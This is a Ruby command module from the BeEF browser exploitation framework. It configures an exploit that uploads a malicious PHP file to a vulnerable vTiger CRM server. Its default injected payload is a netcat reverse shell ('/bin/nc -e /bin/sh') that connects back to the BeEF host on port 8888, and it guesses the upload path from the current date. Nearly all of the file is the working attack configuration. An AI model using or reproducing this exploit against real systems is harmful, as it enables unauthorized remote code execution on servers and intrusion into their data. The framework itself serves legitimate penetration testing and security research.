#
# Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
  def self.options
    time = Time.new
    weekno = case time.day
             when 1..7 then 1
             when 8..14 then 2
             when 15..21 then 3
             when 22..28 then 4
             else 5
             end

    @configuration = BeEF::Core::Configuration.instance
    beef_host = @configuration.beef_host
    [
      { 'name' => 'vtiger_url', 'ui_label' => 'Target Web Server', 'value' => 'http://vulnerable-vtiger.site', 'width' => '400px' },
      { 'name' => 'vtiger_filepath', 'ui_label' => 'Target Directory', 'value' => "/storage/#{time.year}/#{time.strftime('%B')}/week#{weekno}/",
        'width' => '400px' },
      { 'name' => 'mal_filename', 'ui_label' => 'Malicious Filename', 'value' => rand(32**10).to_s(32), 'width' => '400px' },
      { 'name' => 'mal_ext', 'ui_label' => 'Malicious File Extension', 'value' => 'PHP', 'width' => '400px' },
      { 'name' => 'vtiger_php', 'ui_label' => 'Injected PHP (must escape single quotes)', 'value' => "<?php passthru(\"/bin/nc -e /bin/sh #{beef_host} 8888\"); ?>", 'type' => 'textarea',
        'width' => '400px', 'height' => '100px' },
      { 'name' => 'upload_timeout', 'ui_label' => 'Upload Timeout', 'value' => '5000' }
    ]
  end

  def post_execute
    return if @datastore['result'].nil?

    save({ 'result' => @datastore['result'] })
  end
end
